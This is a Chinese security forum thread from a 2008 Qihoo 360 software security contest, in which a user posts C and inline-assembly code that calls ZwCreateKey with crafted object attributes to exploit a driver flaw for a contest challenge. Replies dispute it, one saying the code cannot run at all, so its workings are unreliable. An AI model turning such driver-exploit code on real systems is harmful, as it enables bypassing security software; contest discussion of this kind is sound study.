首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 5)奇虎360软件安全比赛
    3. 发新帖
[分享]第三题的解法
2008-12-23 08:26 22689

[分享]第三题的解法

hnbluehat 活跃值
2008-12-23 08:26
22689
利用驱动的漏洞:
核心代码:
HKEY hkey=(HKEY)"360game";
   WCHAR xx[] = L"xxxx_fuck";

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);

OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;

InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");

__asm{
  
   push 0
    push 0
    push 0
    push 0
    lea eax,oba
    push eax
    push 0
    push 0
    call p
   
}

[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界

收藏
点赞0
打赏
分享
最新回复 (4)
windsun
雪    币: 221
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
windsun 1 2008-12-23 08:48
2
0
看你的代码好像是不行的
hnbluehat
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
hnbluehat 2008-12-23 09:00
3
0
我在虚拟机上试过了的,呵呵
XSJS
雪    币: 152
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
XSJS 2008-12-23 10:29
4
0
这个就是所谓的歪解了
qihoocom
雪    币: 635
活跃值: (101)
能力值: ( LV12,RANK:420 )
在线值:
发帖
回帖
粉丝
私信
qihoocom 9 2008-12-23 14:03
5
0
什么歪解,搞笑吧 ****
这个代码根本都跑不了的,ZwCreateKey根本执行不了~
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回